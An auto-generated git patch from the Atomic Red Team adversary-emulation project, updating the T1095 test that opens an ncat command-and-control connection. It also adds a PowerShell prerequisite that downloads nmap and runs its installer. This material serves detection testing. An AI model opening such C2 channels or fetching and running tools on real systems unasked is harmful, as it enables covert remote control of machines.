From 1854eb9db8a9cde7bf339fbfc4e65532a1db2e1a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 5 Feb 2020 17:23:40 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1095/T1095.md | 23 +++++++++++++++-------- atomics/index.yaml | 28 +++++++++++++++++++--------- 2 files changed, 34 insertions(+), 17 deletions(-) diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 89b5a2d9..342e4f7b 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -53,26 +53,33 @@ nc -l -p #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| server_ip | The IP address or domain name of the listening server | ip | 127.0.0.1| -| server_port | The port for the C2 connection | port number | 80| +| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| +| server_port | The port for the C2 connection | integer | 80| +| ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `powershell`! ``` -ncat #{server_ip} #{server_port} +cmd /c #{ncat_exe} #{server_ip} #{server_port} ``` -#### Dependencies: Run with `command_prompt`! -##### Description: Nmap must be installed +#### Dependencies: Run with `PowerShell`! +##### Description: ncat.exe must be available at specified location (#{ncat_exe}) ##### Check Prereq Commands: ``` -ncat -h 2> nul +if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` -echo "Install nmap so that ncat.exe will be available for use" +$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" +Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath" +Expand-Archive $zippath $parentpath -Force +$unzipPath = Join-Path $parentPath "nmap-7.80" +if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) { + Start-Process (Join-Path $unzipPath "vcredist_x86.exe") +} ``` diff --git a/atomics/index.yaml b/atomics/index.yaml index 1ec2e5c5..340fd324 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -28120,25 +28120,35 @@ command-and-control: device, type the following: \nnc -l -p \n" supported_platforms: - windows - dependency_executor_name: command_prompt + dependency_executor_name: PowerShell dependencies: - - description: Nmap must be installed - prereq_command: ncat -h 2> nul - get_prereq_command: echo "Install nmap so that ncat.exe will be available - for use" + - description: ncat.exe must be available at specified location (#{ncat_exe}) + prereq_command: if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} + get_prereq_command: |- + $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" + Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath" + Expand-Archive $zippath $parentpath -Force + $unzipPath = Join-Path $parentPath "nmap-7.80" + if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) { + Start-Process (Join-Path $unzipPath "vcredist_x86.exe") + } input_arguments: server_ip: description: The IP address or domain name of the listening server - type: ip + type: string default: 127.0.0.1 server_port: description: The port for the C2 connection - type: port number + type: integer default: 80 + ncat_exe: + description: The location of ncat.exe + type: path + default: "$env:TEMP\\T1095\\nmap-7.80\\ncat.exe" executor: - name: command_prompt + name: powershell elevation_required: false - command: 'ncat #{server_ip} #{server_port} + command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} ' - name: Powercat C2